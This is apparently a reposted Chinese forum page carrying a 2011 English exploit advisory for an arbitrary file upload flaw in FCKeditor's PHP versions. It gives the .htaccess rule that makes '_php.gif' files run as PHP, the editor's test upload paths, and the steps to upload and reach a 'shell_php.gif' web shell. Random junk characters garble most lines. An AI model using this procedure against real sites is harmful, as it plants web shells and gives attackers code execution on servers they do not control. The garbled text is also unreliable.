FCKeditor所有php版本Upload上传漏洞
: h5 Y7 [! E0 d4 K' T作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07+ ^/ n! \: J8 {
减小字体 增大字体
* |! F- c0 Y' p1 A* \0 b[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
! M1 k+ j# _' ][+] Date: 20113 k: w; }2 ?9 a* K* _6 r$ g) O2 e
[+] Author : sinesafe.cn* o7 `# N* n2 i5 X' y2 V6 H% o2 ]
[+] Website : WwW.sinesafe.cn# j0 w1 m+ X+ `6 J
———————————————————
% Z* i8 ^1 r% V$ U3 `1.create a htaccess file:2 F$ Y% o* c L& Z o$ m
code:
s, ? n. d- ?$ p<FilesMatch “_php.gif”>' [+ I3 N' ?7 e& d
SetHandler application/x-httpd-php% X- o$ N9 ~. u% y1 @0 A
</FilesMatch>
8 f* m# C7 o6 g5 b8 K% W% M. m6 q3 F' v' q' M& f+ v& Z7 Y
2.Now upload this htaccess with FCKeditor.% l* v9 `4 ?3 x! J
; h0 l+ g! X1 ^" j2 y' vhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html2 [2 V; g; U. }0 E1 J
$ L8 m5 _: m: e5 m- P2 T% }" M0 D
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
l9 V0 L8 C `( e: A3 s2 ]
$ A2 s. \) G" W" H8 ~. g———————————————————————————————-$ k0 |. D9 l' e) s- w# G- j
3.Now upload shell.php.gif with FCKeditor.
" j- ?3 h' C# x7 o4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically., t6 H5 u9 \& n6 |- T) }
5.http://www.sinesafe.cn/anything/shell_php.gif: S# D9 i: d; z: n! x
6.Now shell is available from server. |
1 Q# _; v( {4 }0 }3 F8 G1 i. `
" Y* _) ~4 {9 I: K" ^! l" M+ w3 H' [- N+ U4 y- D+ E+ Y+ L( U
|
发表于 2013-10-27 17:25:21
收藏
支持
反对